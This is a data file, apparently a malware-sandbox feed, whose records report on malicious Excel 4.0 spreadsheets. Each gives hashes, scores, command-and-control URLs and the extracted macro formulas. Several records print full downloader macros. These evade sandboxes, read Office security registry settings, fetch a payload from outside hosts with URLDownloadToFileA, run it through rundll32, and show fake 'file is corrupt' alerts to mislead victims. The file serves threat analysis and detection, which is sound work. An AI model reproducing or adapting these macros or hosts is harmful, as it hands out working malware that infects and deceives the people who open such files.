corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s2oMZkpxKK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aa9ab3959a297bfe6c63fd65fbb7e6f815114b964221d3c29df64cf01d2cf08e"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aa9ab3959a297bfe6c63fd65fbb7e6f815114b964221d3c29df64cf01d2cf08e","filesize":185344,"md5":"b1a95b4a824c5e09b4ebd2fe1f8814b5","sha1":"4bd7f00803ffc1e564dc16b1286625a65cc907c9","sha256":"aa9ab3959a297bfe6c63fd65fbb7e6f815114b964221d3c29df64cf01d2cf08e","sha512":"6ab8068851878af4823c72b32a6379526a0f1729fc7bf47da4d55a2568db918fed00cf5481b48c545ceb2a150a9899d9b6e36589e39f96c1c7798aeed4f94a2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aa9ab3959a297bfe6c63fd65fbb7e6f815114b964221d3c29df64cf01d2cf08e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aaa5beb652bb56e6dc1a2c8cfc6685c3a50d6c1956a8b00156bb49172675fd8f"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aaa5beb652bb56e6dc1a2c8cfc6685c3a50d6c1956a8b00156bb49172675fd8f","filesize":147968,"md5":"057889a8581426f1c9a3250a66ae1771","sha1":"6dd1081907dbe9dd6354f094c3b63dc3035d92ef","sha256":"aaa5beb652bb56e6dc1a2c8cfc6685c3a50d6c1956a8b00156bb49172675fd8f","sha512":"915dcd8e4ddb06dcae797ffa2bb765a4810960741f96b372a010cf9cd7d16bb355414a0d1fda9a6c0b8a9553f2ea58147f84968f449751949b5051fca41be9c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aaa5beb652bb56e6dc1a2c8cfc6685c3a50d6c1956a8b00156bb49172675fd8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"NlDVFibKIp\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aab7c7a0f0ff47830ceada457005a06d43ad6fbd7ac70f127e6525604a84b586"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aab7c7a0f0ff47830ceada457005a06d43ad6fbd7ac70f127e6525604a84b586","filesize":104448,"md5":"5245303e08ea7341b6322dce83d611d2","sha1":"0b40a7e22de72ecf448e7ed5cb5c90595725a382","sha256":"aab7c7a0f0ff47830ceada457005a06d43ad6fbd7ac70f127e6525604a84b586","sha512":"5184b02e851223b95bf2dd792e0d4cbd186ec0d8795d2705ef96e8fae70dda9473b8be1865a9877075ae09110409f60f4dc88433e2eb8670177d9350873d06ef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aab7c7a0f0ff47830ceada457005a06d43ad6fbd7ac70f127e6525604a84b586.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"UdsNWwVE0e\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aabbbef591ae741668b2c2d31db4192e889155c209867312bdd1ddddf9f38c6c"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aabbbef591ae741668b2c2d31db4192e889155c209867312bdd1ddddf9f38c6c","filesize":206336,"md5":"c52d16fb0091721b2857e43ac7afd92b","sha1":"3896b74f3290c978fc3ede2e8feed87a0305739b","sha256":"aabbbef591ae741668b2c2d31db4192e889155c209867312bdd1ddddf9f38c6c","sha512":"197d303a422d026aa46dbf90aff6024732eb2fad0512897da1031cb6672565754699857a635266a96f58bf986c3ab0dd914af0043bfee3a7d642aa8995aaa19a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aabbbef591ae741668b2c2d31db4192e889155c209867312bdd1ddddf9f38c6c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gmM8vvPsxW\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aacc68e63db217062ab103a248f2d749257177748d4d11e267094dfdada8eb45"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aacc68e63db217062ab103a248f2d749257177748d4d11e267094dfdada8eb45","filesize":212992,"md5":"9b5c8bffb50e17b3dc27f6342763c36c","sha1":"baf7a05f2c8ef8409f186701bc02eb1b2a7dbf02","sha256":"aacc68e63db217062ab103a248f2d749257177748d4d11e267094dfdada8eb45","sha512":"4bebd8cf5af781d5255fac2f87c325e6dcac860b5b40897178c43b3591d8b371d022135c8023199f16a4504dd723395cb5635e9f264f18d64b61cf2bd6a1bd6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aacc68e63db217062ab103a248f2d749257177748d4d11e267094dfdada8eb45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s4SoFdve9B\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aad676b02db8c3644f8b19b124e3cea592c186320c133a0f4c62588c3dfb645c"},"analysis":{"reported":"2020-04-09T16:18:14Z","score":10},"files":[{"filename":"aad676b02db8c3644f8b19b124e3cea592c186320c133a0f4c62588c3dfb645c","filesize":167936,"md5":"c52b20580edba654c7f62bb978872c77","sha1":"f6141aabdc4bb8a09025b7036b5c177ac42dcee2","sha256":"aad676b02db8c3644f8b19b124e3cea592c186320c133a0f4c62588c3dfb645c","sha512":"b4cb5f54a191ac82d4d92d441779e0c0a55128a9248c22db115297bb4a80e8aeb27111287ad257b2657e9fd48408ef143b747df3e39eddc95a4c02834c0ded18","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aad676b02db8c3644f8b19b124e3cea592c186320c133a0f4c62588c3dfb645c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8Ikfc13k0k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aaf4e4f1183d10415edcca7255ab3a5de4e70c37cdf80128c14513086c5910c0"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"aaf4e4f1183d10415edcca7255ab3a5de4e70c37cdf80128c14513086c5910c0","filesize":167936,"md5":"8b9e11b22cdf47a1dbaac92a5eaeeeff","sha1":"b02b94ee0208bb645637706d49cd0ccf3f052394","sha256":"aaf4e4f1183d10415edcca7255ab3a5de4e70c37cdf80128c14513086c5910c0","sha512":"bef0311e8ba1265150a7a74041034e0a5bb87696537613d390ea0e740cce86b2618987527e8bb82dc916454503e8bca6f5f83c0f485c30650f8640ba5ecf9caa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aaf4e4f1183d10415edcca7255ab3a5de4e70c37cdf80128c14513086c5910c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EDzaTpNFrP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aaf5b6628744bc21909330f6f5ccef2cb6c615adb82992a9339264706f7f04d6"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"aaf5b6628744bc21909330f6f5ccef2cb6c615adb82992a9339264706f7f04d6","filesize":214528,"md5":"23f882f09b6ec6d1e8074f6103ef9119","sha1":"983a0b803b58140b05a506d27f03bb3cf7d04855","sha256":"aaf5b6628744bc21909330f6f5ccef2cb6c615adb82992a9339264706f7f04d6","sha512":"2f5806640e54877d603e7c263775683f2e18f03741d93050d9c3a450d967a2f14a50b4183584579e0973e6c1d24e78b6586979dc9f2185469338785bfb3f76be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aaf5b6628744bc21909330f6f5ccef2cb6c615adb82992a9339264706f7f04d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LFGvYyGU10\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aaff09e515c47a5bdc739cc8a606a9e3e2a10a0c7c537413184601b1d766c063"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"aaff09e515c47a5bdc739cc8a606a9e3e2a10a0c7c537413184601b1d766c063","filesize":185344,"md5":"0293bb93ef6764b700a1aec72d78ffc8","sha1":"2deb458c9c594f2575ddf1cedcba39624e40b9de","sha256":"aaff09e515c47a5bdc739cc8a606a9e3e2a10a0c7c537413184601b1d766c063","sha512":"5082918973114c2727ce9bbb61207471c5e4690aae182b43920402a4c85b5109703f34caf73ae4c36e012540ae837eed71e6a1828e488af4a7af827cd30770f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aaff09e515c47a5bdc739cc8a606a9e3e2a10a0c7c537413184601b1d766c063.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab121fb9ab2438885c90dc0a00a05dc388d05109dc176a32598813aa55f85379"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"ab121fb9ab2438885c90dc0a00a05dc388d05109dc176a32598813aa55f85379","filesize":118784,"md5":"781cc783bc6c4b3f8b5c481d4d383363","sha1":"23ec3a3d354a3ae80921171558f473d91faea3ee","sha256":"ab121fb9ab2438885c90dc0a00a05dc388d05109dc176a32598813aa55f85379","sha512":"9222cf819e6ac9a83b0ee5e98be1e1d4d077f0bcc9c7ddac38a870138eeac98b5b45bb3222c4d6b066d3697c157325cd75078e288c1a5ce749bad57c1abf32e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab121fb9ab2438885c90dc0a00a05dc388d05109dc176a32598813aa55f85379.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bz4YpVerGo\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab1fb4e275e9e8610bfdf1ac0c38e5089e13f1ae611f2ca85781b147ca3c00bc"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab1fb4e275e9e8610bfdf1ac0c38e5089e13f1ae611f2ca85781b147ca3c00bc","filesize":112640,"md5":"04ec3ba66d1406625f4f8214a5efaba3","sha1":"a703da5298d65f920f19491fef4f63fa8edaa4cf","sha256":"ab1fb4e275e9e8610bfdf1ac0c38e5089e13f1ae611f2ca85781b147ca3c00bc","sha512":"4879b6fd3200a0e3659762c4ce0aaf4e1fc0ba30b7db9610537ca2d86e93174498dbb2c28203a96e03cae1d83bc1989092154007ce25d8f02da918455c55ded6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab1fb4e275e9e8610bfdf1ac0c38e5089e13f1ae611f2ca85781b147ca3c00bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab26ab2474d2840131b1a2e33dcf1332d24ebb989432b255b06f1c18ca95ead2"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab26ab2474d2840131b1a2e33dcf1332d24ebb989432b255b06f1c18ca95ead2","filesize":185344,"md5":"4479116ad4750c78598676db05edd6aa","sha1":"be6d109dc2fa5890fb28424e9de9c65b086b4448","sha256":"ab26ab2474d2840131b1a2e33dcf1332d24ebb989432b255b06f1c18ca95ead2","sha512":"ef0548154a18bd1af7a101f7a5a155354fabb6986c153932c2c18bc7809c91b88d6e6e157e5747ac713cd87fa9e5382e8e7b21e73382fb9ecf9876545beaba77","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab26ab2474d2840131b1a2e33dcf1332d24ebb989432b255b06f1c18ca95ead2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab662fd0fad63a8104e71957c0b196eefb7e16930ee52fc2efae54714bada91b"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab662fd0fad63a8104e71957c0b196eefb7e16930ee52fc2efae54714bada91b","filesize":185344,"md5":"a0aa442446f2140fdb5698cd0e374362","sha1":"e0506176ffbe649b7ba966ec1f030403fa293f61","sha256":"ab662fd0fad63a8104e71957c0b196eefb7e16930ee52fc2efae54714bada91b","sha512":"bb4c76a94f29d8582f1a36a1979d2ba857e0c50fd3f32edb0a029a79187a33638c19e2d5ee344e1373440b288046e9f9a15ad577fc8b47331697fe27b1594b38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab662fd0fad63a8104e71957c0b196eefb7e16930ee52fc2efae54714bada91b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab6a28abf39e58a46ebfcd72658cab2d0d88305cb1bde9a848584d48d5053fd8"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab6a28abf39e58a46ebfcd72658cab2d0d88305cb1bde9a848584d48d5053fd8","filesize":160768,"md5":"dfb6ac3784c69355c7ff074b4729d9e8","sha1":"080a2e64266663f7a1497851d480898fa91c1318","sha256":"ab6a28abf39e58a46ebfcd72658cab2d0d88305cb1bde9a848584d48d5053fd8","sha512":"bd3c698c2d88c629cc61d8583362fd8a8a262d07370ff19de2f5a733edb87eaa23f4760af4b4be1a23ba67db3f1959ce2e296ae7fad49057d7737a1613738dc4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab6a28abf39e58a46ebfcd72658cab2d0d88305cb1bde9a848584d48d5053fd8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"md5BNSnnV0\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab806555e2fefa956483a2fff0d2517e7d25d3db316a9da3079bde9980565bf5"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab806555e2fefa956483a2fff0d2517e7d25d3db316a9da3079bde9980565bf5","filesize":185344,"md5":"34b11d43abf51b699bc8f67135956996","sha1":"9879ab78214dc97fea116e6a48d9df854598b056","sha256":"ab806555e2fefa956483a2fff0d2517e7d25d3db316a9da3079bde9980565bf5","sha512":"90a854fe7965388670f36af5f76b2860aeb8c5be9530f8aaf20253868237b2d4f0f91e02ad3e3c8c00be1aed688c55051ca2c347979474388e679f55e8679dc1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab806555e2fefa956483a2fff0d2517e7d25d3db316a9da3079bde9980565bf5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab8cfde9690e3de5f10792f1ff55d6537920df7ba2ff4cd7eca28a345256467f"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab8cfde9690e3de5f10792f1ff55d6537920df7ba2ff4cd7eca28a345256467f","filesize":168960,"md5":"e4541eeda1b2a42fb90334548ec4da4e","sha1":"9a9f3ed06f22d03633bdc75de133204bc93629e3","sha256":"ab8cfde9690e3de5f10792f1ff55d6537920df7ba2ff4cd7eca28a345256467f","sha512":"0ab4c726225eadf873b2e919cc38e4709bedf3865831b5968bb5980fdeb7db7528f06ad439f592158ef3dd04312ebf91fccca92b2ea1319fe45248a384ddf200","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab8cfde9690e3de5f10792f1ff55d6537920df7ba2ff4cd7eca28a345256467f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gamPuRi8kn\",TRUE)\nGOTO(R$0C$19)"}}}]}
